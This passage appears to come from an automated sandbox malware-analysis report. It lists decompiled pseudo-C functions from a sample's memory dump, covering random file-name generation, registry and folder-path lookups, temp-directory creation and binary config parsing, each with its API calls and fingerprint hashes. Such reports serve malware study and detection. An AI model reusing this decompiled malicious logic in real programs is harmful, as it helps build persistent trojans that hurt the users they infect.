    				}
    				_t84 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				if(_t87 > 0) {
    					_v20 = _a4 & 0x00000004;
    					do {
    						if(_v8 == 2) {
    							if((E004176E1() & 0x00000100) == 0) {
    								_v32 = "aeiouy";
    								_v28 = _t77;
    							} else {
    								_v32 = _t77;
    								_v28 = "aeiouy";
    							}
    							_v8 = _v8 & 0x00000000;
    						}
    						_t88 =  *((intOrPtr*)(_t89 + _v8 * 4 - 0x1c));
    						_v24 = ((0 | _t88 != _t77) - 0x00000001 & 0x0000000d) + 6;
    						if(_v20 == 0 || _t84 - _v12 <= 1 || (E004176E1() & 0x00000101) != 0x101) {
    							_t71 =  *((char*)(E0041772D(_v24 - 1, 0) + _t88));
    						} else {
    							_t71 = 0x20;
    							_v12 = _t84;
    						}
    						_a8[_t84] = _t71;
    						_t84 = _t84 + 1;
    						_v8 = _v8 + 1;
    					} while (_t84 < _v16);
    					_t87 = _v16;
    				}
    				if((_a4 & 0x00000004) == 0 || _t87 == 0) {
    					_t85 = _a8;
    				} else {
    					_t85 = _a8;
    					_t59 = _t85 + _t87 * 2 - 2;
    					while( *_t59 == 0x20) {
    						_t59 = _t59 - 2;
    						_t87 = _t87 - 1;
    						if(_t87 != 0) {
    							continue;
    						} else {
    						}
    						goto L24;
    					}
    				}
    				L24:
    				_t57 = 0;
    				_t85[_t87] = 0;
    				if((_a4 & 0x00000002) != 0) {
    					_t57 = CharUpperW( *_t85 & 0x0000ffff);
    					 *_t85 = 0;
    				}
    				return _t57;
    			}

    APIs
      • Part of subcall function 004176E1: GetTickCount.KERNEL32 ref: 004176E1
    • CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041A848
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CharCountTickUpper
    • String ID: .exe$aeiouy$bcdfghklmnpqrstvwxz
    • API String ID: 2674899715-3410450461
    • Opcode ID: 279d27c63a1b12d8c7cd95e40054647b493df084a6177ad84f6652389f6a22de
    • Instruction ID: f0f18a3186838922c56157931b3056ffbeda769d93fd2ca599884456a1bd5665
    • Opcode Fuzzy Hash: 279d27c63a1b12d8c7cd95e40054647b493df084a6177ad84f6652389f6a22de
    • Instruction Fuzzy Hash: 35317075E012099BCB11EFA9C1452EEB7B0EF44314F64806BD921AB280D378DA91CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E0040AD7E(void* __ecx, char* __edx, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v52;
    				char _v76;
    				char _v116;
    				char _v636;
    				short _v1156;
    				void* __edi;
    				void* __esi;
    				void* _t28;
    				void* _t30;
    				void* _t35;
    				void* _t39;
    				char* _t42;
    				void* _t52;
    				WCHAR* _t55;
    				char* _t60;
    				signed int _t61;
    				void* _t62;
    				intOrPtr _t70;
    
    				_t54 = __edx;
    				_t52 = __ecx;
    				E0041645B( &_v12,  &_v12, 0, 8);
    				_t28 = 0x60;
    				E0040FA33(_t28,  &_v116);
    				_t30 = 0x61;
    				E0040FA33(_t30,  &_v52);
    				_t55 =  &_v636;
    				_t35 = E0041A4CC(0x80000002, _t52, _t55,  &_v116,  &_v52, 0x104);
    				if(_t35 != 0xffffffff) {
    					_t65 = _t35;
    					if(_t35 > 0) {
    						ExpandEnvironmentStringsW(_t55,  &_v1156, 0x104);
    						E0040AB36(_t65,  &_v1156,  &_v12);
    					}
    				}
    				if(_v8 != 0) {
    					L9:
    					if(_t70 <= 0) {
    						return E004163A8(_v12);
    					}
    					_push(0xcb);
    					return E004099E1(_t54, _v12, 0x63);
    				} else {
    					_t60 =  &_v76;
    					_t39 = 0x62;
    					E0040FA33(_t39, _t60);
    					_v28 = 0x23;
    					_v24 = 0x1a;
    					_v20 = 0x26;
    					_v16 = _t60;
    					_t61 = 0;
    					do {
    						_t42 =  &_v636;
    						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
    						_t68 = _t42;
    						if(_t42 == 0) {
    							_t54 =  &_v16;
    							E0041BAD3( &_v636,  &_v16, _t68, 1, 2, E0040AB90,  &_v12, 0, 0, 0);
    						}
    						_t61 = _t61 + 1;
    					} while (_t61 < 3);
    					_t70 = _v8;
    					goto L9;
    				}
    			}

    APIs
      • Part of subcall function 0041A4CC: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040E535,?,?,00000104,.exe,00000000), ref: 0041A4E1
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0040ADE0
    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 0040AE30
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: EnvironmentExpandFolderOpenPathStrings
    • String ID: #$&
    • API String ID: 1994525040-3870246384
    • Opcode ID: 5d8815c3a9d2aa7bfa6a9eb485c7623a0aa7105e154b4724a89e4bcf204dca36
    • Instruction ID: 1ac8d9ba4bf02b825aecd231ad752b1442e59bdafd182cef3b5a5227f163e12a
    • Opcode Fuzzy Hash: 5d8815c3a9d2aa7bfa6a9eb485c7623a0aa7105e154b4724a89e4bcf204dca36
    • Instruction Fuzzy Hash: A33141B2D40218BADF20EAA0DC89EDF777DEB04308F10457BF605F7181D6789A998B95
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E0040B62E(void* __ecx, char* __edx, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v44;
    				char _v68;
    				char _v120;
    				char _v644;
    				short _v1164;
    				void* __edi;
    				void* __esi;
    				void* _t28;
    				void* _t30;
    				void* _t35;
    				void* _t39;
    				char* _t42;
    				void* _t52;
    				WCHAR* _t55;
    				char* _t60;
    				signed int _t61;
    				void* _t62;
    				intOrPtr _t70;
    
    				_t54 = __edx;
    				_t52 = __ecx;
    				E0041645B( &_v12,  &_v12, 0, 8);
    				_t28 = 0x77;
    				E0040FA33(_t28,  &_v120);
    				_t30 = 0x78;
    				E0040FA33(_t30,  &_v44);
    				_t55 =  &_v644;
    				_t35 = E0041A4CC(0x80000001, _t52, _t55,  &_v120,  &_v44, 0x104);
    				if(_t35 != 0xffffffff) {
    					_t65 = _t35;
    					if(_t35 > 0) {
    						ExpandEnvironmentStringsW(_t55,  &_v1164, 0x104);
    						E0040B3D1(_t65,  &_v1164,  &_v12);
    					}
    				}
    				if(_v8 != 0) {
    					L9:
    					if(_t70 <= 0) {
    						return E004163A8(_v12);
    					}
    					_push(0xcb);
    					return E004099E1(_t54, _v12, 0x7a);
    				} else {
    					_t60 =  &_v68;
    					_t39 = 0x79;
    					E0040FA33(_t39, _t60);
    					_v28 = 0x1a;
    					_v24 = 0x26;
    					_v20 = 0x23;
    					_v16 = _t60;
    					_t61 = 0;
    					do {
    						_t42 =  &_v644;
    						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
    						_t68 = _t42;
    						if(_t42 == 0) {
    							_t54 =  &_v16;
    							E0041BAD3( &_v644,  &_v16, _t68, 1, 2, E0040B409,  &_v12, 0, 0, 0);
    						}
    						_t61 = _t61 + 1;
    					} while (_t61 < 3);
    					_t70 = _v8;
    					goto L9;
    				}
    			}

    APIs
      • Part of subcall function 0041A4CC: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040E535,?,?,00000104,.exe,00000000), ref: 0041A4E1
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0040B690
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 0040B6E0
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: EnvironmentExpandFolderOpenPathStrings
    • String ID: #$&
    • API String ID: 1994525040-3870246384
    • Opcode ID: 4943f4c2dd022e3c878b6061b0b98becc5fa07f3d2f83119365f65502caf91b8
    • Instruction ID: 3a821a54bc86351cd1d50711d9884b64c3d97fc65b5f484b637e8ea21d14064e
    • Opcode Fuzzy Hash: 4943f4c2dd022e3c878b6061b0b98becc5fa07f3d2f83119365f65502caf91b8
    • Instruction Fuzzy Hash: BE3141B2D00218AADF209AA1DC85EDE777CEB44314F10457BF604F7181D7789A498B99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00404D61(WCHAR* __ebx, void* __ecx, char _a4) {
    				void* __edi;
    				long _t3;
    				WCHAR* _t13;
    
    				_t13 = __ebx;
    				if( *0x4223a8 == 0) {
    					E0040F0DC(__ecx, 0x4223a8, 2);
    					 *((short*)(E004163E4(0x4225b0, 0x4223a8, E00416EF7(0x4223a8) + _t10) + 0x4225b0)) = 0;
    					_t3 = PathRemoveFileSpecW(0x4225b0);
    				}
    				if(_t13 != 0) {
    					E00416749(_t3 | 0xffffffff, 0x4223a8, _t13);
    					_t3 = PathRenameExtensionW(_t13, L".tmp");
    				}
    				if(_a4 != 0 &&  *0x422e04 > 1) {
    					E0041B9B1(0x4225b0);
    					E00419A29(0x4225b0);
    					_t3 = GetFileAttributesW(0x4223a8);
    					if(_t3 != 0xffffffff) {
    						return E00419A29(0x4223a8);
    					}
    				}
    				return _t3;
    			}

    APIs
    • PathRemoveFileSpecW.SHLWAPI(004225B0,004225B0,004223A8,00000000,00000002,?,?,004053B9,00000000,?,00000000,00000318,?,?,00000102), ref: 00404D99
    • PathRenameExtensionW.SHLWAPI(?,.tmp,?,?,004053B9,00000000,?,00000000,00000318,?,?,00000102), ref: 00404DB5
    • GetFileAttributesW.KERNEL32(004223A8,004225B0,004225B0,?,?,004053B9,00000000,?,00000000,00000318,?,?,00000102), ref: 00404DD8
      • Part of subcall function 0040F0DC: PathRenameExtensionW.SHLWAPI(?,.dat,?,00422BF8,00000000,00000032,?,77E49EB0,00000000), ref: 0040F155
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Path$ExtensionFileRename$AttributesRemoveSpec
    • String ID: .tmp
    • API String ID: 3627892477-2986845003
    • Opcode ID: 03b235db2e8e5c9de1891f7133d78c4fd731c3ed89e54fdb4a1e4521fd320cfc
    • Instruction ID: 8715d0874576f80325629d2be52c9f05014a4e8750de57ed776ddc91c1fcbcde
    • Opcode Fuzzy Hash: 03b235db2e8e5c9de1891f7133d78c4fd731c3ed89e54fdb4a1e4521fd320cfc
    • Instruction Fuzzy Hash: 69F0ADB47012503AD62133369D99ABF26599FC2724F48427FF511B11E2CBBC8C8682AD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041B9B1(WCHAR* _a4) {
    				signed int _t4;
    				short _t9;
    				signed short _t10;
    				WCHAR* _t11;
    				WCHAR* _t12;
    				int _t18;
    
    				_t12 = _a4;
    				_t9 = 0;
    				_t11 = PathSkipRootW(_t12);
    				if(_t11 == 0) {
    					_t11 = _t12;
    				}
    				while(1) {
    					_t4 =  *_t11 & 0x0000ffff;
    					if(_t4 == 0x5c || _t4 == 0x2f || _t4 == 0) {
    						goto L5;
    					}
    					L11:
    					_t11 =  &(_t11[1]);
    					continue;
    					L5:
    					_t10 = _t4;
    					 *_t11 = 0;
    					if(GetFileAttributesW(_t12) == 0xffffffff) {
    						_t18 = CreateDirectoryW(_t12, 0);
    					}
    					if(_t18 == 0) {
    						L13:
    						return _t9;
    					} else {
    						if(_t10 == 0) {
    							_t9 = 1;
    							goto L13;
    						}
    						 *_t11 = _t10;
    						goto L11;
    					}
    				}
    			}

    APIs
    • PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,00409818,?,?,?,?,?), ref: 0041B9BC
    • GetFileAttributesW.KERNEL32(?,?,00000000,00409818,?,?,?,?,?), ref: 0041B9E4
    • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00409818,?,?,?,?,?), ref: 0041B9F2
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: AttributesCreateDirectoryFilePathRootSkip
    • String ID: .exe
    • API String ID: 4231520044-4119554291
    • Opcode ID: 89ea5dabdb69a1ae74796b9d5cdc0e3a786227b64b7e38f5ffc8dcfccd190e2b
    • Instruction ID: 4fc1a830e0316e2339356bde62ecdff554d82ca467e21fa9c322599df1756fc7
    • Opcode Fuzzy Hash: 89ea5dabdb69a1ae74796b9d5cdc0e3a786227b64b7e38f5ffc8dcfccd190e2b
    • Instruction Fuzzy Hash: 1DF0FC761512515AC6300E7648046F7B798DF11BF0B55452BEDD4E3360D7399CC392EC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E0041B7AF(WCHAR* _a4) {
    				short _v524;
    				char _v1044;
    				void* __edi;
    				void* _t11;
    				void* _t19;
    				void* _t20;
    
    				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
    					L6:
    					return 0;
    				}
    				_t19 = 0;
    				while(1) {
    					_push(E004176E1());
    					_push(L"tmp");
    					_t18 =  &_v1044;
    					_t11 = E0041709B(_t10, 0x104,  &_v1044, L"%s%08x");
    					_t20 = _t20 + 0xc;
    					if(_t11 == 0xffffffff) {
    						goto L6;
    					}
    					if(E0041BC2F(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {
    						_t19 = _t19 + 1;
    						if(_t19 < 0x64) {
    							continue;
    						}
    						goto L6;
    					} else {
    						return 1;
    					}
    				}
    				goto L6;
    			}

    APIs
    • GetTempPathW.KERNEL32(000000F6,?,00000000,?), ref: 0041B7C6
      • Part of subcall function 004176E1: GetTickCount.KERNEL32 ref: 004176E1
      • Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E
    • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 0041B818
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Path$CombineCountCreateDirectoryTempTick
    • String ID: %s%08x$tmp
    • API String ID: 1218007593-1196434543
    • Opcode ID: f4eee9356edaea47e23a212eab1d88da4f4d8a8ee39ced2ae2206dbfcfaae08c
    • Instruction ID: 1d04d7f4387e5e7115fc2907d10b2953b50f5a63a87d0dc4151b215f543c5e03
    • Opcode Fuzzy Hash: f4eee9356edaea47e23a212eab1d88da4f4d8a8ee39ced2ae2206dbfcfaae08c
    • Instruction Fuzzy Hash: 73F0DCB120022866DA20BA249C05BFF776CDB81B24F1001B2FA15E61E1E779DDC6D6DC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00417BAF(void* __ecx) {
    				signed int _v8;
    				struct HINSTANCE__* _t7;
    
    				_v8 = _v8 & 0x00000000;
    				_t7 = GetModuleHandleW(L"kernel32.dll");
    				if(_t7 == 0) {
    					L4:
    					return _t7 & 0xffffff00 | _v8 != 0x00000000;
    				} else {
    					_t7 = GetProcAddress(_t7, "IsWow64Process");
    					if(_t7 == 0) {
    						goto L4;
    					} else {
    						_t7 = _t7->i(0xffffffff,  &_v8);
    						if(_t7 != 0) {
    							goto L4;
    						} else {
    							return 0;
    						}
    					}
    				}
    			}

    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0040E67D,00000000,0040EBA4), ref: 00417BBC
    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00417BCC
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: IsWow64Process$kernel32.dll
    • API String ID: 1646373207-3024904723
    • Opcode ID: 00ad86c78921f555b2750e010b1ab6502140692f7f546da3edaec4ee2554cb13
    • Instruction ID: 08ecffd3716a4fa4c7f929e87bb611a86052d3b6d800b14c8ebfc81d271d5bba
    • Opcode Fuzzy Hash: 00ad86c78921f555b2750e010b1ab6502140692f7f546da3edaec4ee2554cb13
    • Instruction Fuzzy Hash: 4FE0923160C201BADF0457A19C06F9B32A84B40BADF1406699110E51C0DB78EA449118
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004072BF(intOrPtr _a4, intOrPtr _a12) {
    				void* __esi;
    				void* _t6;
    				signed int _t7;
    				intOrPtr _t9;
    
    				if(_a12 == 0x64 || _a12 == 0x33) {
    					EnterCriticalSection(0x4228c0);
    					_t7 = E00406C86(_a4);
    					if(_t7 != 0xffffffff) {
    						_t9 =  *0x4228d8; // 0x0
    						_t7 = SetEvent( *(_t7 * 0x24 + _t9 + 4));
    					}
    					LeaveCriticalSection(0x4228c0);
    					return _t7;
    				}
    				return _t6;
    			}

    APIs
    • EnterCriticalSection.KERNEL32(004228C0), ref: 004072D5
    • SetEvent.KERNEL32(?), ref: 004072F6
    • LeaveCriticalSection.KERNEL32(004228C0), ref: 004072FD
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CriticalSection$EnterEventLeave
    • String ID: 3
    • API String ID: 3094578987-1842515611
    • Opcode ID: e1dcf17b7c2cf0c47dc445bebf5b05363395469a461e1c86793b1d434a0ada6f
    • Instruction ID: 177c6b338cad148803c455502c3679f2083353f09032a2f4fb7f4d57dd9b470f
    • Opcode Fuzzy Hash: e1dcf17b7c2cf0c47dc445bebf5b05363395469a461e1c86793b1d434a0ada6f
    • Instruction Fuzzy Hash: 1BE09231508200AFC3206B25AE4881A7B64EBD2331701C27EF416F21F0C738D852DF2A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E004143EC(void* __edx, intOrPtr _a4) {
    				signed int _v12;
    				int _v16;
    				void* _v20;
    				int _v24;
    				signed int _v28;
    				int _v32;
    				char _v36;
    				signed int _v40;
    				signed int _v44;
    				signed int _v48;
    				signed int _v52;
    				intOrPtr _v56;
    				signed int _v60;
    				signed int _v64;
    				intOrPtr _v74;
    				intOrPtr _v78;
    				char _v80;
    				struct _SYSTEMTIME _v96;
    				char _v112;
    				short _v184;
    				short _v288;
    				void* __ebx;
    				void* __esi;
    				signed int _t127;
    				signed int _t131;
    				signed int _t132;
    				signed int _t133;
    				signed int _t134;
    				signed int _t140;
    				signed int _t142;
    				signed int _t143;
    				signed int _t151;
    				signed int _t155;
    				signed int _t159;
    				signed char _t163;
    				signed int _t167;
    				signed int _t176;
    				signed int _t177;
    				signed int _t186;
    				long _t191;
    				long _t195;
    				signed int _t201;
    				void* _t202;
    				signed int _t203;
    				signed int _t208;
    				signed int _t211;
    				signed int _t212;
    				signed int _t219;
    				short* _t230;
    				signed int _t238;
    				intOrPtr _t239;
    				void* _t244;
    
    				_t239 = _a4;
    				_t126 =  *((intOrPtr*)(_t239 + 0x40));
    				if( *((intOrPtr*)(_t239 + 0x40)) != 0) {
    					_t127 = E0041BF16( &_v12, __edx, __eflags, _t126, 0x4e27, 0x10000000);
    					 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
    					 *(_t239 + 0x38) =  *(_t239 + 0x38) & 0x00000000;
    					_t238 = _t127;
    					_v64 = _t238;
    					__eflags = _t238;
    					if(_t238 == 0) {
    						L55:
    						E004163A8(_v64);
    						__eflags = 0 -  *(_t239 + 0x3c);
    						asm("sbb eax, eax");
    						return  ~0x00000000;
    					}
    					_t131 = _v12;
    					__eflags = _t131 - 0x10;
    					if(_t131 <= 0x10) {
    						goto L55;
    					}
    					__eflags =  *((char*)(_t239 + 0x18)) - 1;
    					_v16 = 1;
    					_t132 = _t131 + _t238;
    					__eflags = _t132;
    					_v28 = ((0 |  *((char*)(_t239 + 0x18)) != 0x00000001) - 0x00000001 & 0xffffffe0) + 0x00000040 & 0x0000ffff;
    					_v12 = _t132;
    					while(1) {
    						_t133 =  *(_t238 + 2) & 0x0000ffff;
    						__eflags = _t133 - 0x10;
    						if(_t133 < 0x10) {
    							goto L55;
    						}
    						_t219 =  *(_t238 + 4) & 0x0000ffff;
    						__eflags = _t219 - _t133;
    						if(_t219 >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 6) - _t133;
    						if( *(_t238 + 6) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 8) - _t133;
    						if( *(_t238 + 8) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 0xa) - _t133;
    						if( *(_t238 + 0xa) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 0xc) - _t133;
    						if( *(_t238 + 0xc) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 0xe) - _t133;
    						if( *(_t238 + 0xe) >= _t133) {
    							goto L55;
    						}
    						_t134 =  *_t238 & 0x0000ffff;
    						_t208 = _t134 >> 0x00000009 & 0x00000008;
    						_t220 = _t238 + _t219;
    						__eflags = (_t134 & _v28) - _v28;
    						if((_t134 & _v28) != _v28) {
    							L48:
    							_t238 = _t238 + ( *(_t238 + 2) & 0x0000ffff);
    							_t102 = _t238 + 0x10; // 0x10
    							__eflags = _t102 - _v12;
    							if(_t102 > _v12) {
    								goto L55;
    							}
    							__eflags = ( *(_t238 + 2) & 0x0000ffff) + _t238 - _v12;
    							if(( *(_t238 + 2) & 0x0000ffff) + _t238 > _v12) {
    								goto L55;
    							}
    							_v16 = _v16 + 1;
    							continue;
    						}
    						_t234 = _t208;
    						_t140 = E004140C9(_t220, _t208,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)));
    						__eflags = _t140;
    						if(_t140 == 0) {
    							goto L48;
    						}
    						_t141 =  *(_t239 + 0x44);
    						__eflags =  *(_t239 + 0x44);
    						if(__eflags == 0) {
    							L16:
    							_t142 =  *(_t238 + 8) & 0x0000ffff;
    							__eflags = _t142;
    							if(_t142 == 0) {
    								L18:
    								_t143 =  *(_t238 + 0xa) & 0x0000ffff;
    								__eflags = _t143;
    								if(_t143 == 0) {
    									L20:
    									__eflags =  *_t238 & 0x00000010;
    									if(( *_t238 & 0x00000010) == 0) {
    										L31:
    										E0041645B( &_v60,  &_v60, 0, 0x1c);
    										_v60 =  *_t238 & 0x0000ffff;
    										_t209 = _t208 | 0xffffffff;
    										_v56 = E00416806(_t208 | 0xffffffff, ( *(_t238 + 4) & 0x0000ffff) + _t238);
    										_t151 =  *(_t238 + 6) & 0x0000ffff;
    										__eflags = _t151;
    										if(_t151 != 0) {
    											__eflags = _t151 + _t238;
    											_v52 = E00416806(_t209, _t151 + _t238);
    										} else {
    											_v52 = _v52 & 0x00000000;
    										}
    										_t155 =  *(_t238 + 0xc) & 0x0000ffff;
    										__eflags = _t155;
    										if(_t155 != 0) {
    											__eflags = _t155 + _t238;
    											_v48 = E00416806(_t209, _t155 + _t238);
    										} else {
    											_v48 = _v48 & 0x00000000;
    										}
    										_t159 =  *(_t238 + 0xe) & 0x0000ffff;
    										__eflags = _t159;
    										if(_t159 != 0) {
    											__eflags = _t159 + _t238;
    											_v44 = E00416806(_t209, _t159 + _t238);
    										} else {
    											_v44 = _v44 & 0x00000000;
    										}
    										_t163 =  *_t238 & 0x0000ffff;
    										__eflags = _t163 & 0x00000003;
    										if((_t163 & 0x00000003) != 0) {
    											E0041532C( *(_t239 + 0x3c),  *(_t239 + 0x38));
    											 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
    											_t167 = E004163FB(__eflags,  &_v60, 0x1c);
    											 *(_t239 + 0x38) = _t167;
    											__eflags = _t167;
    											if(_t167 == 0) {
    												E00415303( &_v60);
    												_t239 = _a4;
    											} else {
    												 *(_t239 + 0x3c) =  *(_t239 + 0x3c) + 1;
    											}
    											goto L55;
    										} else {
    											__eflags = _t163 & 0x0000000c;
    											if(__eflags == 0) {
    												E00415303( &_v60);
    												L47:
    												_t239 = _a4;
    												goto L48;
    											}
    											_t211 = E0041BF16( &_v36, _t234, __eflags,  *((intOrPtr*)(_t239 + 0x40)), _v16, 0x40000000);
    											_v40 = _t211;
    											__eflags = _t211;
    											if(_t211 == 0) {
    												L54:
    												E004163A8(_t211);
    												E00415303( &_v60);
    												_t239 = _a4;
    												E0041532C( *(_t239 + 0x3c),  *((intOrPtr*)(_a4 + 0x38)));
    												_t122 = _t239 + 0x3c;
    												 *_t122 =  *(_t239 + 0x3c) & 0x00000000;
    												__eflags =  *_t122;
    												goto L55;
    											}
    											_t176 = E0041C5E8(_t211, _v36);
    											__eflags = _t176;
    											if(_t176 == 0) {
    												goto L54;
    											}
    											_t177 = E00416333(( *(_t239 + 0x3c) + 1) * 0x1c, _t239 + 0x38);
    											__eflags = _t177;
    											if(_t177 == 0) {
    												goto L54;
    											}
    											 *(_a4 + 0x3c) =  *(_a4 + 0x3c) + 1;
    											E004163E4( *(_a4 + 0x3c) * 0x1c +  *((intOrPtr*)(_t178 + 0x38)),  &_v60, 0x1c);
    											goto L47;
    										}
    									}
    									__eflags =  *(_t238 + 0xc);
    									if( *(_t238 + 0xc) <= 0) {
    										goto L31;
    									}
    									E0040F16A( &_v184, _t220, 1,  &_v288);
    									_t186 = E0041764D( &_v112, ( *(_t238 + 0xc) & 0x0000ffff) + _t238, E00416EE5(( *(_t238 + 0xc) & 0x0000ffff) + _t238));
    									__eflags = _t186;
    									if(_t186 == 0) {
    										goto L48;
    									}
    									_t230 =  &_v184;
    									_t212 = 0;
    									__eflags = 0;
    									do {
    										E00416710( *((intOrPtr*)(_t244 + _t212 - 0x6c)), _t230);
    										_t212 = _t212 + 1;
    										_t230 = _t230 + 4;
    										__eflags = _t212 - 0x10;
    									} while (_t212 < 0x10);
    									_v32 = _v32 | 0xffffffff;
    									_t208 = 0x10;
    									 *_t230 = 0;
    									_v24 = _t208;
    									_v20 = 0x80000001;
    									_t191 = RegOpenKeyExW(0x80000001,  &_v288, 0, 1,  &_v20);
    									__eflags = _t191;
    									if(_t191 != 0) {
    										goto L31;
    									}
    									_t195 = RegQueryValueExW(_v20,  &_v184, 0, 0,  &_v80,  &_v24);
    									__eflags = _t195;
    									if(_t195 == 0) {
    										_v32 = _v24;
    									}
    									RegCloseKey(_v20);
    									__eflags = _v32 - _t208;
    									if(_v32 == _t208) {
    										GetLocalTime( &_v96);
    										__eflags = _v74 - _v96.wDay;
    										if(_v74 != _v96.wDay) {
    											goto L31;
    										}
    										__eflags = _v78 - _v96.wMonth;
    										if(_v78 == _v96.wMonth) {
    											goto L48;
    										}
    									}
    									goto L31;
    								}
    								_t220 = _t238 + _t143;
    								_t201 = E004140FE(_t238 + _t143,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
    								__eflags = _t201;
    								if(_t201 == 0) {
    									goto L48;
    								}
    								goto L20;
    							}
    							_t220 = _t238 + _t142;
    							_t202 = E004140FE(_t238 + _t142,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
    							__eflags = _t202 - 1;
    							if(_t202 == 1) {
    								goto L48;
    							}
    							goto L18;
    						}
